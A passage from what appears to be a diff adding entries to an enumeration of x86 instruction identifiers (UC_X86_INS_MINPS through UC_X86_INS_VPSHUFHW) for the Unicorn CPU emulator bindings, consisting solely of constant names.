UC_X86_INS_MINPS, + UC_X86_INS_MINSD, + UC_X86_INS_MINSS, + UC_X86_INS_CVTPD2PI, + UC_X86_INS_CVTPI2PD, + UC_X86_INS_CVTPI2PS, + UC_X86_INS_CVTPS2PI, + UC_X86_INS_CVTTPD2PI, + UC_X86_INS_CVTTPS2PI, + UC_X86_INS_EMMS, + UC_X86_INS_MASKMOVQ, + UC_X86_INS_MOVD, + UC_X86_INS_MOVDQ2Q, + UC_X86_INS_MOVNTQ, + UC_X86_INS_MOVQ2DQ, + UC_X86_INS_MOVQ, + UC_X86_INS_PABSB, + UC_X86_INS_PABSD, + UC_X86_INS_PABSW, + UC_X86_INS_PACKSSDW, + UC_X86_INS_PACKSSWB, + UC_X86_INS_PACKUSWB, + UC_X86_INS_PADDB, + UC_X86_INS_PADDD, + UC_X86_INS_PADDQ, + UC_X86_INS_PADDSB, + UC_X86_INS_PADDSW, + UC_X86_INS_PADDUSB, + UC_X86_INS_PADDUSW, + UC_X86_INS_PADDW, + UC_X86_INS_PALIGNR, + UC_X86_INS_PANDN, + UC_X86_INS_PAND, + UC_X86_INS_PAVGB, + UC_X86_INS_PAVGW, + UC_X86_INS_PCMPEQB, + UC_X86_INS_PCMPEQD, + UC_X86_INS_PCMPEQW, + UC_X86_INS_PCMPGTB, + UC_X86_INS_PCMPGTD, + UC_X86_INS_PCMPGTW, + UC_X86_INS_PEXTRW, + UC_X86_INS_PHADDSW, + UC_X86_INS_PHADDW, + UC_X86_INS_PHADDD, + UC_X86_INS_PHSUBD, + UC_X86_INS_PHSUBSW, + UC_X86_INS_PHSUBW, + UC_X86_INS_PINSRW, + UC_X86_INS_PMADDUBSW, + UC_X86_INS_PMADDWD, + UC_X86_INS_PMAXSW, + UC_X86_INS_PMAXUB, + UC_X86_INS_PMINSW, + UC_X86_INS_PMINUB, + UC_X86_INS_PMOVMSKB, + UC_X86_INS_PMULHRSW, + UC_X86_INS_PMULHUW, + UC_X86_INS_PMULHW, + UC_X86_INS_PMULLW, + UC_X86_INS_PMULUDQ, + UC_X86_INS_POR, + UC_X86_INS_PSADBW, + UC_X86_INS_PSHUFB, + UC_X86_INS_PSHUFW, + UC_X86_INS_PSIGNB, + UC_X86_INS_PSIGND, + UC_X86_INS_PSIGNW, + UC_X86_INS_PSLLD, + UC_X86_INS_PSLLQ, + UC_X86_INS_PSLLW, + UC_X86_INS_PSRAD, + UC_X86_INS_PSRAW, + UC_X86_INS_PSRLD, + UC_X86_INS_PSRLQ, + UC_X86_INS_PSRLW, + UC_X86_INS_PSUBB, + UC_X86_INS_PSUBD, + UC_X86_INS_PSUBQ, + UC_X86_INS_PSUBSB, + UC_X86_INS_PSUBSW, + UC_X86_INS_PSUBUSB, + UC_X86_INS_PSUBUSW, + UC_X86_INS_PSUBW, + UC_X86_INS_PUNPCKHBW, + UC_X86_INS_PUNPCKHDQ, + UC_X86_INS_PUNPCKHWD, + UC_X86_INS_PUNPCKLBW, + UC_X86_INS_PUNPCKLDQ, + UC_X86_INS_PUNPCKLWD, + UC_X86_INS_PXOR, + UC_X86_INS_MONITOR, + UC_X86_INS_MONTMUL, + UC_X86_INS_MOV, + UC_X86_INS_MOVABS, + UC_X86_INS_MOVBE, + UC_X86_INS_MOVDDUP, + UC_X86_INS_MOVDQA, + UC_X86_INS_MOVDQU, + UC_X86_INS_MOVHLPS, + UC_X86_INS_MOVHPD, + UC_X86_INS_MOVHPS, + UC_X86_INS_MOVLHPS, + UC_X86_INS_MOVLPD, + UC_X86_INS_MOVLPS, + UC_X86_INS_MOVMSKPD, + UC_X86_INS_MOVMSKPS, + UC_X86_INS_MOVNTDQA, + UC_X86_INS_MOVNTDQ, + UC_X86_INS_MOVNTI, + UC_X86_INS_MOVNTPD, + UC_X86_INS_MOVNTPS, + UC_X86_INS_MOVNTSD, + UC_X86_INS_MOVNTSS, + UC_X86_INS_MOVSB, + UC_X86_INS_MOVSD, + UC_X86_INS_MOVSHDUP, + UC_X86_INS_MOVSLDUP, + UC_X86_INS_MOVSQ, + UC_X86_INS_MOVSS, + UC_X86_INS_MOVSW, + UC_X86_INS_MOVSX, + UC_X86_INS_MOVSXD, + UC_X86_INS_MOVUPD, + UC_X86_INS_MOVUPS, + UC_X86_INS_MOVZX, + UC_X86_INS_MPSADBW, + UC_X86_INS_MUL, + UC_X86_INS_MULPD, + UC_X86_INS_MULPS, + UC_X86_INS_MULSD, + UC_X86_INS_MULSS, + UC_X86_INS_MULX, + UC_X86_INS_FMUL, + UC_X86_INS_FIMUL, + UC_X86_INS_FMULP, + UC_X86_INS_MWAIT, + UC_X86_INS_NEG, + UC_X86_INS_NOP, + UC_X86_INS_NOT, + UC_X86_INS_OUT, + UC_X86_INS_OUTSB, + UC_X86_INS_OUTSD, + UC_X86_INS_OUTSW, + UC_X86_INS_PACKUSDW, + UC_X86_INS_PAUSE, + UC_X86_INS_PAVGUSB, + UC_X86_INS_PBLENDVB, + UC_X86_INS_PBLENDW, + UC_X86_INS_PCLMULQDQ, + UC_X86_INS_PCMPEQQ, + UC_X86_INS_PCMPESTRI, + UC_X86_INS_PCMPESTRM, + UC_X86_INS_PCMPGTQ, + UC_X86_INS_PCMPISTRI, + UC_X86_INS_PCMPISTRM, + UC_X86_INS_PCOMMIT, + UC_X86_INS_PDEP, + UC_X86_INS_PEXT, + UC_X86_INS_PEXTRB, + UC_X86_INS_PEXTRD, + UC_X86_INS_PEXTRQ, + UC_X86_INS_PF2ID, + UC_X86_INS_PF2IW, + UC_X86_INS_PFACC, + UC_X86_INS_PFADD, + UC_X86_INS_PFCMPEQ, + UC_X86_INS_PFCMPGE, + UC_X86_INS_PFCMPGT, + UC_X86_INS_PFMAX, + UC_X86_INS_PFMIN, + UC_X86_INS_PFMUL, + UC_X86_INS_PFNACC, + UC_X86_INS_PFPNACC, + UC_X86_INS_PFRCPIT1, + UC_X86_INS_PFRCPIT2, + UC_X86_INS_PFRCP, + UC_X86_INS_PFRSQIT1, + UC_X86_INS_PFRSQRT, + UC_X86_INS_PFSUBR, + UC_X86_INS_PFSUB, + UC_X86_INS_PHMINPOSUW, + UC_X86_INS_PI2FD, + UC_X86_INS_PI2FW, + UC_X86_INS_PINSRB, + UC_X86_INS_PINSRD, + UC_X86_INS_PINSRQ, + UC_X86_INS_PMAXSB, + UC_X86_INS_PMAXSD, + UC_X86_INS_PMAXUD, + UC_X86_INS_PMAXUW, + UC_X86_INS_PMINSB, + UC_X86_INS_PMINSD, + UC_X86_INS_PMINUD, + UC_X86_INS_PMINUW, + UC_X86_INS_PMOVSXBD, + UC_X86_INS_PMOVSXBQ, + UC_X86_INS_PMOVSXBW, + UC_X86_INS_PMOVSXDQ, + UC_X86_INS_PMOVSXWD, + UC_X86_INS_PMOVSXWQ, + UC_X86_INS_PMOVZXBD, + UC_X86_INS_PMOVZXBQ, + UC_X86_INS_PMOVZXBW, + UC_X86_INS_PMOVZXDQ, + UC_X86_INS_PMOVZXWD, + UC_X86_INS_PMOVZXWQ, + UC_X86_INS_PMULDQ, + UC_X86_INS_PMULHRW, + UC_X86_INS_PMULLD, + UC_X86_INS_POP, + UC_X86_INS_POPAW, + UC_X86_INS_POPAL, + UC_X86_INS_POPCNT, + UC_X86_INS_POPF, + UC_X86_INS_POPFD, + UC_X86_INS_POPFQ, + UC_X86_INS_PREFETCH, + UC_X86_INS_PREFETCHNTA, + UC_X86_INS_PREFETCHT0, + UC_X86_INS_PREFETCHT1, + UC_X86_INS_PREFETCHT2, + UC_X86_INS_PREFETCHW, + UC_X86_INS_PSHUFD, + UC_X86_INS_PSHUFHW, + UC_X86_INS_PSHUFLW, + UC_X86_INS_PSLLDQ, + UC_X86_INS_PSRLDQ, + UC_X86_INS_PSWAPD, + UC_X86_INS_PTEST, + UC_X86_INS_PUNPCKHQDQ, + UC_X86_INS_PUNPCKLQDQ, + UC_X86_INS_PUSH, + UC_X86_INS_PUSHAW, + UC_X86_INS_PUSHAL, + UC_X86_INS_PUSHF, + UC_X86_INS_PUSHFD, + UC_X86_INS_PUSHFQ, + UC_X86_INS_RCL, + UC_X86_INS_RCPPS, + UC_X86_INS_RCPSS, + UC_X86_INS_RCR, + UC_X86_INS_RDFSBASE, + UC_X86_INS_RDGSBASE, + UC_X86_INS_RDMSR, + UC_X86_INS_RDPMC, + UC_X86_INS_RDRAND, + UC_X86_INS_RDSEED, + UC_X86_INS_RDTSC, + UC_X86_INS_RDTSCP, + UC_X86_INS_ROL, + UC_X86_INS_ROR, + UC_X86_INS_RORX, + UC_X86_INS_ROUNDPD, + UC_X86_INS_ROUNDPS, + UC_X86_INS_ROUNDSD, + UC_X86_INS_ROUNDSS, + UC_X86_INS_RSM, + UC_X86_INS_RSQRTPS, + UC_X86_INS_RSQRTSS, + UC_X86_INS_SAHF, + UC_X86_INS_SAL, + UC_X86_INS_SALC, + UC_X86_INS_SAR, + UC_X86_INS_SARX, + UC_X86_INS_SBB, + UC_X86_INS_SCASB, + UC_X86_INS_SCASD, + UC_X86_INS_SCASQ, + UC_X86_INS_SCASW, + UC_X86_INS_SETAE, + UC_X86_INS_SETA, + UC_X86_INS_SETBE, + UC_X86_INS_SETB, + UC_X86_INS_SETE, + UC_X86_INS_SETGE, + UC_X86_INS_SETG, + UC_X86_INS_SETLE, + UC_X86_INS_SETL, + UC_X86_INS_SETNE, + UC_X86_INS_SETNO, + UC_X86_INS_SETNP, + UC_X86_INS_SETNS, + UC_X86_INS_SETO, + UC_X86_INS_SETP, + UC_X86_INS_SETS, + UC_X86_INS_SFENCE, + UC_X86_INS_SGDT, + UC_X86_INS_SHA1MSG1, + UC_X86_INS_SHA1MSG2, + UC_X86_INS_SHA1NEXTE, + UC_X86_INS_SHA1RNDS4, + UC_X86_INS_SHA256MSG1, + UC_X86_INS_SHA256MSG2, + UC_X86_INS_SHA256RNDS2, + UC_X86_INS_SHL, + UC_X86_INS_SHLD, + UC_X86_INS_SHLX, + UC_X86_INS_SHR, + UC_X86_INS_SHRD, + UC_X86_INS_SHRX, + UC_X86_INS_SHUFPD, + UC_X86_INS_SHUFPS, + UC_X86_INS_SIDT, + UC_X86_INS_FSIN, + UC_X86_INS_SKINIT, + UC_X86_INS_SLDT, + UC_X86_INS_SMSW, + UC_X86_INS_SQRTPD, + UC_X86_INS_SQRTPS, + UC_X86_INS_SQRTSD, + UC_X86_INS_SQRTSS, + UC_X86_INS_FSQRT, + UC_X86_INS_STAC, + UC_X86_INS_STC, + UC_X86_INS_STD, + UC_X86_INS_STGI, + UC_X86_INS_STI, + UC_X86_INS_STMXCSR, + UC_X86_INS_STOSB, + UC_X86_INS_STOSD, + UC_X86_INS_STOSQ, + UC_X86_INS_STOSW, + UC_X86_INS_STR, + UC_X86_INS_FST, + UC_X86_INS_FSTP, + UC_X86_INS_FSTPNCE, + UC_X86_INS_FXCH, + UC_X86_INS_SUBPD, + UC_X86_INS_SUBPS, + UC_X86_INS_FSUBR, + UC_X86_INS_FISUBR, + UC_X86_INS_FSUBRP, + UC_X86_INS_SUBSD, + UC_X86_INS_SUBSS, + UC_X86_INS_FSUB, + UC_X86_INS_FISUB, + UC_X86_INS_FSUBP, + UC_X86_INS_SWAPGS, + UC_X86_INS_SYSCALL, + UC_X86_INS_SYSENTER, + UC_X86_INS_SYSEXIT, + UC_X86_INS_SYSRET, + UC_X86_INS_T1MSKC, + UC_X86_INS_TEST, + UC_X86_INS_UD2, + UC_X86_INS_FTST, + UC_X86_INS_TZCNT, + UC_X86_INS_TZMSK, + UC_X86_INS_FUCOMPI, + UC_X86_INS_FUCOMI, + UC_X86_INS_FUCOMPP, + UC_X86_INS_FUCOMP, + UC_X86_INS_FUCOM, + UC_X86_INS_UD2B, + UC_X86_INS_UNPCKHPD, + UC_X86_INS_UNPCKHPS, + UC_X86_INS_UNPCKLPD, + UC_X86_INS_UNPCKLPS, + UC_X86_INS_VADDPD, + UC_X86_INS_VADDPS, + UC_X86_INS_VADDSD, + UC_X86_INS_VADDSS, + UC_X86_INS_VADDSUBPD, + UC_X86_INS_VADDSUBPS, + UC_X86_INS_VAESDECLAST, + UC_X86_INS_VAESDEC, + UC_X86_INS_VAESENCLAST, + UC_X86_INS_VAESENC, + UC_X86_INS_VAESIMC, + UC_X86_INS_VAESKEYGENASSIST, + UC_X86_INS_VALIGND, + UC_X86_INS_VALIGNQ, + UC_X86_INS_VANDNPD, + UC_X86_INS_VANDNPS, + UC_X86_INS_VANDPD, + UC_X86_INS_VANDPS, + UC_X86_INS_VBLENDMPD, + UC_X86_INS_VBLENDMPS, + UC_X86_INS_VBLENDPD, + UC_X86_INS_VBLENDPS, + UC_X86_INS_VBLENDVPD, + UC_X86_INS_VBLENDVPS, + UC_X86_INS_VBROADCASTF128, + UC_X86_INS_VBROADCASTI32X4, + UC_X86_INS_VBROADCASTI64X4, + UC_X86_INS_VBROADCASTSD, + UC_X86_INS_VBROADCASTSS, + UC_X86_INS_VCMPPD, + UC_X86_INS_VCMPPS, + UC_X86_INS_VCMPSD, + UC_X86_INS_VCMPSS, + UC_X86_INS_VCOMPRESSPD, + UC_X86_INS_VCOMPRESSPS, + UC_X86_INS_VCVTDQ2PD, + UC_X86_INS_VCVTDQ2PS, + UC_X86_INS_VCVTPD2DQX, + UC_X86_INS_VCVTPD2DQ, + UC_X86_INS_VCVTPD2PSX, + UC_X86_INS_VCVTPD2PS, + UC_X86_INS_VCVTPD2UDQ, + UC_X86_INS_VCVTPH2PS, + UC_X86_INS_VCVTPS2DQ, + UC_X86_INS_VCVTPS2PD, + UC_X86_INS_VCVTPS2PH, + UC_X86_INS_VCVTPS2UDQ, + UC_X86_INS_VCVTSD2SI, + UC_X86_INS_VCVTSD2USI, + UC_X86_INS_VCVTSS2SI, + UC_X86_INS_VCVTSS2USI, + UC_X86_INS_VCVTTPD2DQX, + UC_X86_INS_VCVTTPD2DQ, + UC_X86_INS_VCVTTPD2UDQ, + UC_X86_INS_VCVTTPS2DQ, + UC_X86_INS_VCVTTPS2UDQ, + UC_X86_INS_VCVTUDQ2PD, + UC_X86_INS_VCVTUDQ2PS, + UC_X86_INS_VDIVPD, + UC_X86_INS_VDIVPS, + UC_X86_INS_VDIVSD, + UC_X86_INS_VDIVSS, + UC_X86_INS_VDPPD, + UC_X86_INS_VDPPS, + UC_X86_INS_VERR, + UC_X86_INS_VERW, + UC_X86_INS_VEXP2PD, + UC_X86_INS_VEXP2PS, + UC_X86_INS_VEXPANDPD, + UC_X86_INS_VEXPANDPS, + UC_X86_INS_VEXTRACTF128, + UC_X86_INS_VEXTRACTF32X4, + UC_X86_INS_VEXTRACTF64X4, + UC_X86_INS_VEXTRACTI128, + UC_X86_INS_VEXTRACTI32X4, + UC_X86_INS_VEXTRACTI64X4, + UC_X86_INS_VEXTRACTPS, + UC_X86_INS_VFMADD132PD, + UC_X86_INS_VFMADD132PS, + UC_X86_INS_VFMADDPD, + UC_X86_INS_VFMADD213PD, + UC_X86_INS_VFMADD231PD, + UC_X86_INS_VFMADDPS, + UC_X86_INS_VFMADD213PS, + UC_X86_INS_VFMADD231PS, + UC_X86_INS_VFMADDSD, + UC_X86_INS_VFMADD213SD, + UC_X86_INS_VFMADD132SD, + UC_X86_INS_VFMADD231SD, + UC_X86_INS_VFMADDSS, + UC_X86_INS_VFMADD213SS, + UC_X86_INS_VFMADD132SS, + UC_X86_INS_VFMADD231SS, + UC_X86_INS_VFMADDSUB132PD, + UC_X86_INS_VFMADDSUB132PS, + UC_X86_INS_VFMADDSUBPD, + UC_X86_INS_VFMADDSUB213PD, + UC_X86_INS_VFMADDSUB231PD, + UC_X86_INS_VFMADDSUBPS, + UC_X86_INS_VFMADDSUB213PS, + UC_X86_INS_VFMADDSUB231PS, + UC_X86_INS_VFMSUB132PD, + UC_X86_INS_VFMSUB132PS, + UC_X86_INS_VFMSUBADD132PD, + UC_X86_INS_VFMSUBADD132PS, + UC_X86_INS_VFMSUBADDPD, + UC_X86_INS_VFMSUBADD213PD, + UC_X86_INS_VFMSUBADD231PD, + UC_X86_INS_VFMSUBADDPS, + UC_X86_INS_VFMSUBADD213PS, + UC_X86_INS_VFMSUBADD231PS, + UC_X86_INS_VFMSUBPD, + UC_X86_INS_VFMSUB213PD, + UC_X86_INS_VFMSUB231PD, + UC_X86_INS_VFMSUBPS, + UC_X86_INS_VFMSUB213PS, + UC_X86_INS_VFMSUB231PS, + UC_X86_INS_VFMSUBSD, + UC_X86_INS_VFMSUB213SD, + UC_X86_INS_VFMSUB132SD, + UC_X86_INS_VFMSUB231SD, + UC_X86_INS_VFMSUBSS, + UC_X86_INS_VFMSUB213SS, + UC_X86_INS_VFMSUB132SS, + UC_X86_INS_VFMSUB231SS, + UC_X86_INS_VFNMADD132PD, + UC_X86_INS_VFNMADD132PS, + UC_X86_INS_VFNMADDPD, + UC_X86_INS_VFNMADD213PD, + UC_X86_INS_VFNMADD231PD, + UC_X86_INS_VFNMADDPS, + UC_X86_INS_VFNMADD213PS, + UC_X86_INS_VFNMADD231PS, + UC_X86_INS_VFNMADDSD, + UC_X86_INS_VFNMADD213SD, + UC_X86_INS_VFNMADD132SD, + UC_X86_INS_VFNMADD231SD, + UC_X86_INS_VFNMADDSS, + UC_X86_INS_VFNMADD213SS, + UC_X86_INS_VFNMADD132SS, + UC_X86_INS_VFNMADD231SS, + UC_X86_INS_VFNMSUB132PD, + UC_X86_INS_VFNMSUB132PS, + UC_X86_INS_VFNMSUBPD, + UC_X86_INS_VFNMSUB213PD, + UC_X86_INS_VFNMSUB231PD, + UC_X86_INS_VFNMSUBPS, + UC_X86_INS_VFNMSUB213PS, + UC_X86_INS_VFNMSUB231PS, + UC_X86_INS_VFNMSUBSD, + UC_X86_INS_VFNMSUB213SD, + UC_X86_INS_VFNMSUB132SD, + UC_X86_INS_VFNMSUB231SD, + UC_X86_INS_VFNMSUBSS, + UC_X86_INS_VFNMSUB213SS, + UC_X86_INS_VFNMSUB132SS, + UC_X86_INS_VFNMSUB231SS, + UC_X86_INS_VFRCZPD, + UC_X86_INS_VFRCZPS, + UC_X86_INS_VFRCZSD, + UC_X86_INS_VFRCZSS, + UC_X86_INS_VORPD, + UC_X86_INS_VORPS, + UC_X86_INS_VXORPD, + UC_X86_INS_VXORPS, + UC_X86_INS_VGATHERDPD, + UC_X86_INS_VGATHERDPS, + UC_X86_INS_VGATHERPF0DPD, + UC_X86_INS_VGATHERPF0DPS, + UC_X86_INS_VGATHERPF0QPD, + UC_X86_INS_VGATHERPF0QPS, + UC_X86_INS_VGATHERPF1DPD, + UC_X86_INS_VGATHERPF1DPS, + UC_X86_INS_VGATHERPF1QPD, + UC_X86_INS_VGATHERPF1QPS, + UC_X86_INS_VGATHERQPD, + UC_X86_INS_VGATHERQPS, + UC_X86_INS_VHADDPD, + UC_X86_INS_VHADDPS, + UC_X86_INS_VHSUBPD, + UC_X86_INS_VHSUBPS, + UC_X86_INS_VINSERTF128, + UC_X86_INS_VINSERTF32X4, + UC_X86_INS_VINSERTF32X8, + UC_X86_INS_VINSERTF64X2, + UC_X86_INS_VINSERTF64X4, + UC_X86_INS_VINSERTI128, + UC_X86_INS_VINSERTI32X4, + UC_X86_INS_VINSERTI32X8, + UC_X86_INS_VINSERTI64X2, + UC_X86_INS_VINSERTI64X4, + UC_X86_INS_VINSERTPS, + UC_X86_INS_VLDDQU, + UC_X86_INS_VLDMXCSR, + UC_X86_INS_VMASKMOVDQU, + UC_X86_INS_VMASKMOVPD, + UC_X86_INS_VMASKMOVPS, + UC_X86_INS_VMAXPD, + UC_X86_INS_VMAXPS, + UC_X86_INS_VMAXSD, + UC_X86_INS_VMAXSS, + UC_X86_INS_VMCALL, + UC_X86_INS_VMCLEAR, + UC_X86_INS_VMFUNC, + UC_X86_INS_VMINPD, + UC_X86_INS_VMINPS, + UC_X86_INS_VMINSD, + UC_X86_INS_VMINSS, + UC_X86_INS_VMLAUNCH, + UC_X86_INS_VMLOAD, + UC_X86_INS_VMMCALL, + UC_X86_INS_VMOVQ, + UC_X86_INS_VMOVDDUP, + UC_X86_INS_VMOVD, + UC_X86_INS_VMOVDQA32, + UC_X86_INS_VMOVDQA64, + UC_X86_INS_VMOVDQA, + UC_X86_INS_VMOVDQU16, + UC_X86_INS_VMOVDQU32, + UC_X86_INS_VMOVDQU64, + UC_X86_INS_VMOVDQU8, + UC_X86_INS_VMOVDQU, + UC_X86_INS_VMOVHLPS, + UC_X86_INS_VMOVHPD, + UC_X86_INS_VMOVHPS, + UC_X86_INS_VMOVLHPS, + UC_X86_INS_VMOVLPD, + UC_X86_INS_VMOVLPS, + UC_X86_INS_VMOVMSKPD, + UC_X86_INS_VMOVMSKPS, + UC_X86_INS_VMOVNTDQA, + UC_X86_INS_VMOVNTDQ, + UC_X86_INS_VMOVNTPD, + UC_X86_INS_VMOVNTPS, + UC_X86_INS_VMOVSD, + UC_X86_INS_VMOVSHDUP, + UC_X86_INS_VMOVSLDUP, + UC_X86_INS_VMOVSS, + UC_X86_INS_VMOVUPD, + UC_X86_INS_VMOVUPS, + UC_X86_INS_VMPSADBW, + UC_X86_INS_VMPTRLD, + UC_X86_INS_VMPTRST, + UC_X86_INS_VMREAD, + UC_X86_INS_VMRESUME, + UC_X86_INS_VMRUN, + UC_X86_INS_VMSAVE, + UC_X86_INS_VMULPD, + UC_X86_INS_VMULPS, + UC_X86_INS_VMULSD, + UC_X86_INS_VMULSS, + UC_X86_INS_VMWRITE, + UC_X86_INS_VMXOFF, + UC_X86_INS_VMXON, + UC_X86_INS_VPABSB, + UC_X86_INS_VPABSD, + UC_X86_INS_VPABSQ, + UC_X86_INS_VPABSW, + UC_X86_INS_VPACKSSDW, + UC_X86_INS_VPACKSSWB, + UC_X86_INS_VPACKUSDW, + UC_X86_INS_VPACKUSWB, + UC_X86_INS_VPADDB, + UC_X86_INS_VPADDD, + UC_X86_INS_VPADDQ, + UC_X86_INS_VPADDSB, + UC_X86_INS_VPADDSW, + UC_X86_INS_VPADDUSB, + UC_X86_INS_VPADDUSW, + UC_X86_INS_VPADDW, + UC_X86_INS_VPALIGNR, + UC_X86_INS_VPANDD, + UC_X86_INS_VPANDND, + UC_X86_INS_VPANDNQ, + UC_X86_INS_VPANDN, + UC_X86_INS_VPANDQ, + UC_X86_INS_VPAND, + UC_X86_INS_VPAVGB, + UC_X86_INS_VPAVGW, + UC_X86_INS_VPBLENDD, + UC_X86_INS_VPBLENDMB, + UC_X86_INS_VPBLENDMD, + UC_X86_INS_VPBLENDMQ, + UC_X86_INS_VPBLENDMW, + UC_X86_INS_VPBLENDVB, + UC_X86_INS_VPBLENDW, + UC_X86_INS_VPBROADCASTB, + UC_X86_INS_VPBROADCASTD, + UC_X86_INS_VPBROADCASTMB2Q, + UC_X86_INS_VPBROADCASTMW2D, + UC_X86_INS_VPBROADCASTQ, + UC_X86_INS_VPBROADCASTW, + UC_X86_INS_VPCLMULQDQ, + UC_X86_INS_VPCMOV, + UC_X86_INS_VPCMPB, + UC_X86_INS_VPCMPD, + UC_X86_INS_VPCMPEQB, + UC_X86_INS_VPCMPEQD, + UC_X86_INS_VPCMPEQQ, + UC_X86_INS_VPCMPEQW, + UC_X86_INS_VPCMPESTRI, + UC_X86_INS_VPCMPESTRM, + UC_X86_INS_VPCMPGTB, + UC_X86_INS_VPCMPGTD, + UC_X86_INS_VPCMPGTQ, + UC_X86_INS_VPCMPGTW, + UC_X86_INS_VPCMPISTRI, + UC_X86_INS_VPCMPISTRM, + UC_X86_INS_VPCMPQ, + UC_X86_INS_VPCMPUB, + UC_X86_INS_VPCMPUD, + UC_X86_INS_VPCMPUQ, + UC_X86_INS_VPCMPUW, + UC_X86_INS_VPCMPW, + UC_X86_INS_VPCOMB, + UC_X86_INS_VPCOMD, + UC_X86_INS_VPCOMPRESSD, + UC_X86_INS_VPCOMPRESSQ, + UC_X86_INS_VPCOMQ, + UC_X86_INS_VPCOMUB, + UC_X86_INS_VPCOMUD, + UC_X86_INS_VPCOMUQ, + UC_X86_INS_VPCOMUW, + UC_X86_INS_VPCOMW, + UC_X86_INS_VPCONFLICTD, + UC_X86_INS_VPCONFLICTQ, + UC_X86_INS_VPERM2F128, + UC_X86_INS_VPERM2I128, + UC_X86_INS_VPERMD, + UC_X86_INS_VPERMI2D, + UC_X86_INS_VPERMI2PD, + UC_X86_INS_VPERMI2PS, + UC_X86_INS_VPERMI2Q, + UC_X86_INS_VPERMIL2PD, + UC_X86_INS_VPERMIL2PS, + UC_X86_INS_VPERMILPD, + UC_X86_INS_VPERMILPS, + UC_X86_INS_VPERMPD, + UC_X86_INS_VPERMPS, + UC_X86_INS_VPERMQ, + UC_X86_INS_VPERMT2D, + UC_X86_INS_VPERMT2PD, + UC_X86_INS_VPERMT2PS, + UC_X86_INS_VPERMT2Q, + UC_X86_INS_VPEXPANDD, + UC_X86_INS_VPEXPANDQ, + UC_X86_INS_VPEXTRB, + UC_X86_INS_VPEXTRD, + UC_X86_INS_VPEXTRQ, + UC_X86_INS_VPEXTRW, + UC_X86_INS_VPGATHERDD, + UC_X86_INS_VPGATHERDQ, + UC_X86_INS_VPGATHERQD, + UC_X86_INS_VPGATHERQQ, + UC_X86_INS_VPHADDBD, + UC_X86_INS_VPHADDBQ, + UC_X86_INS_VPHADDBW, + UC_X86_INS_VPHADDDQ, + UC_X86_INS_VPHADDD, + UC_X86_INS_VPHADDSW, + UC_X86_INS_VPHADDUBD, + UC_X86_INS_VPHADDUBQ, + UC_X86_INS_VPHADDUBW, + UC_X86_INS_VPHADDUDQ, + UC_X86_INS_VPHADDUWD, + UC_X86_INS_VPHADDUWQ, + UC_X86_INS_VPHADDWD, + UC_X86_INS_VPHADDWQ, + UC_X86_INS_VPHADDW, + UC_X86_INS_VPHMINPOSUW, + UC_X86_INS_VPHSUBBW, + UC_X86_INS_VPHSUBDQ, + UC_X86_INS_VPHSUBD, + UC_X86_INS_VPHSUBSW, + UC_X86_INS_VPHSUBWD, + UC_X86_INS_VPHSUBW, + UC_X86_INS_VPINSRB, + UC_X86_INS_VPINSRD, + UC_X86_INS_VPINSRQ, + UC_X86_INS_VPINSRW, + UC_X86_INS_VPLZCNTD, + UC_X86_INS_VPLZCNTQ, + UC_X86_INS_VPMACSDD, + UC_X86_INS_VPMACSDQH, + UC_X86_INS_VPMACSDQL, + UC_X86_INS_VPMACSSDD, + UC_X86_INS_VPMACSSDQH, + UC_X86_INS_VPMACSSDQL, + UC_X86_INS_VPMACSSWD, + UC_X86_INS_VPMACSSWW, + UC_X86_INS_VPMACSWD, + UC_X86_INS_VPMACSWW, + UC_X86_INS_VPMADCSSWD, + UC_X86_INS_VPMADCSWD, + UC_X86_INS_VPMADDUBSW, + UC_X86_INS_VPMADDWD, + UC_X86_INS_VPMASKMOVD, + UC_X86_INS_VPMASKMOVQ, + UC_X86_INS_VPMAXSB, + UC_X86_INS_VPMAXSD, + UC_X86_INS_VPMAXSQ, + UC_X86_INS_VPMAXSW, + UC_X86_INS_VPMAXUB, + UC_X86_INS_VPMAXUD, + UC_X86_INS_VPMAXUQ, + UC_X86_INS_VPMAXUW, + UC_X86_INS_VPMINSB, + UC_X86_INS_VPMINSD, + UC_X86_INS_VPMINSQ, + UC_X86_INS_VPMINSW, + UC_X86_INS_VPMINUB, + UC_X86_INS_VPMINUD, + UC_X86_INS_VPMINUQ, + UC_X86_INS_VPMINUW, + UC_X86_INS_VPMOVDB, + UC_X86_INS_VPMOVDW, + UC_X86_INS_VPMOVM2B, + UC_X86_INS_VPMOVM2D, + UC_X86_INS_VPMOVM2Q, + UC_X86_INS_VPMOVM2W, + UC_X86_INS_VPMOVMSKB, + UC_X86_INS_VPMOVQB, + UC_X86_INS_VPMOVQD, + UC_X86_INS_VPMOVQW, + UC_X86_INS_VPMOVSDB, + UC_X86_INS_VPMOVSDW, + UC_X86_INS_VPMOVSQB, + UC_X86_INS_VPMOVSQD, + UC_X86_INS_VPMOVSQW, + UC_X86_INS_VPMOVSXBD, + UC_X86_INS_VPMOVSXBQ, + UC_X86_INS_VPMOVSXBW, + UC_X86_INS_VPMOVSXDQ, + UC_X86_INS_VPMOVSXWD, + UC_X86_INS_VPMOVSXWQ, + UC_X86_INS_VPMOVUSDB, + UC_X86_INS_VPMOVUSDW, + UC_X86_INS_VPMOVUSQB, + UC_X86_INS_VPMOVUSQD, + UC_X86_INS_VPMOVUSQW, + UC_X86_INS_VPMOVZXBD, + UC_X86_INS_VPMOVZXBQ, + UC_X86_INS_VPMOVZXBW, + UC_X86_INS_VPMOVZXDQ, + UC_X86_INS_VPMOVZXWD, + UC_X86_INS_VPMOVZXWQ, + UC_X86_INS_VPMULDQ, + UC_X86_INS_VPMULHRSW, + UC_X86_INS_VPMULHUW, + UC_X86_INS_VPMULHW, + UC_X86_INS_VPMULLD, + UC_X86_INS_VPMULLQ, + UC_X86_INS_VPMULLW, + UC_X86_INS_VPMULUDQ, + UC_X86_INS_VPORD, + UC_X86_INS_VPORQ, + UC_X86_INS_VPOR, + UC_X86_INS_VPPERM, + UC_X86_INS_VPROTB, + UC_X86_INS_VPROTD, + UC_X86_INS_VPROTQ, + UC_X86_INS_VPROTW, + UC_X86_INS_VPSADBW, + UC_X86_INS_VPSCATTERDD, + UC_X86_INS_VPSCATTERDQ, + UC_X86_INS_VPSCATTERQD, + UC_X86_INS_VPSCATTERQQ, + UC_X86_INS_VPSHAB, + UC_X86_INS_VPSHAD, + UC_X86_INS_VPSHAQ, + UC_X86_INS_VPSHAW, + UC_X86_INS_VPSHLB, + UC_X86_INS_VPSHLD, + UC_X86_INS_VPSHLQ, + UC_X86_INS_VPSHLW, + UC_X86_INS_VPSHUFB, + UC_X86_INS_VPSHUFD, + UC_X86_INS_VPSHUFHW, + 